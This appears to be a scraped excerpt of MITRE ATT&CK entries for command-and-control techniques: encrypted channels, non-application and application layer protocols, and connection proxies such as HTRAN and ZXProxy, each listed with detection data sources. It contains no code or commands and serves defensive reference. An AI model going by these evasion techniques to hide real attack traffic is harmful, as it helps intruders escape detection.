Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN , ZXProxy, and ZXPortMap. Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre